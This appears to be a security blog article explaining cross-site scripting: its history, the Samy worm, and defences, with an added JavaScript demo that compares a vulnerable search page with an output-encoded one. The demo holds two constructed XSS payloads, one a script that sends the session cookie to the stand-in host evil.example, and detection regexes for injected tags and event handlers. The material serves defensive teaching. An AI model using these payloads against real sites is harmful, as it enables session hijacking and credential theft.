Getting to know these highly customizable cyberattacks and how to protect yourself from them
You wouldn’t think an attack method first documented more than 20 years ago would be at the top of anyone’s list of popular current attacks. But that is the case for Cross-Site Scripting (XSS), a technique first identified and named by Microsoft security engineers at the turn of the century.
Our XSS explainer webpage goes into more detail about the different attack types and some of the more notable attacks and victims down through the years. XSS (tracked as CWE-79) took the top spot in the Common Weakness Enumeration (CWE) Top 25 list of the most dangerous software weaknesses published by MITRE. Other vulnerability trackers have also attested to XSS’ staying power over the years: it was #7 on the 2017 edition of the OWASP Top Ten list of web application security risks.
The basic idea is to inject script into a targeted website’s pages so that a victim’s browser runs it with the trust and privileges of that site. Because the script executes in the site’s origin, it can rewrite the page into a convincing fake login form, read session cookies and send them to an attacker-controlled domain, load further malicious content from elsewhere, or serve as the first stage of a larger compromise. In reflected XSS the user is tricked into clicking a crafted link that carries the payload; in stored XSS the payload is saved on the site itself and runs for every visitor. Either way the user may end up divulging passwords or having their session hijacked, and if the script is chained with a browser exploit the attacker can go further, up to taking control of the PC, depending on the design of the attack.
One of the more infamous XSS attacks was the Samy worm, which spread to more than one million MySpace users in 2005 in less than a day. The payload itself was mostly harmless (it added its author to each victim’s friends list and copied itself onward), but it was costly for that author, Samy Kamkar, who ended up paying a $15,000 fine and serving three years of probation without internet access.
XSS often shows up as a supporting player in a larger attack rather than the whole thing. One well-known case was reported to Uber back in 2018, and a $3,000 bug bounty was paid through HackerOne for the fix. Another, more recent example was seen last month, in which XSS played a role in fooling users into thinking they were dealing with a legitimate tech-support person. In that case the scammers convinced their victims to pay for the support to “unlock” their browsers, using XSS within one of the multiple layers of deception.
So what can you do if you administer a website? There are numerous helpful resources, including these two cheat sheets from OWASP (1, 2) on handling untrusted input. “Basically, you want to employ a combination of validating, filtering, encoding and escaping methods to prevent untrusted user input from executing on the web app,” says George Mathias in his Medium blog post. That post also has more details about historical XSS attacks and other suggestions. If you run a WordPress blog, here are a few suggestions to improve your site’s security posture. Some of these apply to any web server installation, such as choosing something other than “admin” as your administrator username and employing multi-factor authentication.
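To make the attack described above and the encoding advice in the OWASP cheat sheets concrete, here is an added example (not code from the original article, from OWASP, or from the Medium post). It shows a reflected-XSS sink that pastes a search term from the clicked link straight into HTML, beside the same page built with contextual output encoding. The search page, its “q” parameter, the hostnames and the two payloads are all constructed for this demonstration.

```javascript
// Added example (not from the original article or OWASP): a reflected XSS
// sink and its output-encoded counterpart. The search page, its "q" parameter,
// the hostnames and the payloads below are constructed for this demonstration.

// Reflected XSS: the payload travels in the link the victim clicks. Pull the
// search term out of that link the way a server-side handler would.
function queryFromLink(link) {
  return new URL(link).searchParams.get("q") || "";
}

// Vulnerable: untrusted input is concatenated straight into HTML, in both a
// text context (<h1>) and a quoted-attribute context (value=""). Anything the
// attacker puts there becomes markup the victim's browser runs in the site's
// origin, with access to its cookies and DOM.
function renderSearchUnsafe(q) {
  return `<h1>Results for ${q}</h1><input name="q" value="${q}">`;
}

// HTML entity encoding for the text and quoted-attribute contexts. These five
// characters are the ones that can move the HTML parser into a new state.
// JavaScript, URL and CSS contexts need their own encoders, not this one.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every interpolation point encodes for the context it lands in.
function renderSearchSafe(q) {
  const safe = escapeHtml(q);
  return `<h1>Results for ${safe}</h1><input name="q" value="${safe}">`;
}

// Demo checks (heuristics for this example, not a real XSS scanner):
// did the input manage to open a tag, or to plant a quoted event handler?
function opensTag(html) {
  return /<(script|img|svg)\b/i.test(html);
}
function hasEventHandlerAttr(html) {
  return /\son\w+\s*=\s*["']/i.test(html);
}

// Constructed payload 1 (text context): a <script> that ships the session
// cookie to the attacker's host.
const LINK_TEXT_CTX =
  "https://shop.example/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E";

// Constructed payload 2 (attribute context): closes the value="" attribute
// and adds an onfocus handler, without using "<" at all. Filters that only
// strip angle brackets miss this; encoding the quote does not.
const LINK_ATTR_CTX =
  'https://shop.example/search?q=x%22%20autofocus%20onfocus%3D%22alert(1)';

// Walk both payloads through the vulnerable and the hardened renderer.
function demo() {
  const results = {};
  for (const [name, link] of Object.entries({ text: LINK_TEXT_CTX, attr: LINK_ATTR_CTX })) {
    const q = queryFromLink(link);
    results[name] = {
      unsafeInjected: opensTag(renderSearchUnsafe(q)) || hasEventHandlerAttr(renderSearchUnsafe(q)),
      safeInjected: opensTag(renderSearchSafe(q)) || hasEventHandlerAttr(renderSearchSafe(q)),
    };
  }
  return results;
}

for (const [name, r] of Object.entries(demo())) {
  console.log(`${name}: unsafe injected=${r.unsafeInjected}, encoded injected=${r.safeInjected}`);
}
```

The second payload is the reason “strip the angle brackets” is not a fix: it never uses `<`, it only needs a stray `"` to escape the attribute. Encoding per context, as the cheat sheets recommend, closes both holes at once; a Content Security Policy then limits the damage of whatever slips through.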
In support of the International Day for the Elimination of Violence Against Women, Avast CISO Jaya Baloo describes the increased use of stalkerware during 2020 and the correlation between stalkerware and abusive relationships.
Discover how cybersecurity evolved and what prominent cyberattacks led to innovations in online protection.
Peiter Zatko, also known as the famous hacker “Mudge,” is the new head of security at Twitter, where he plans to bring creative solutions to the social platform’s notoriously poor security and preponderance of misinformation.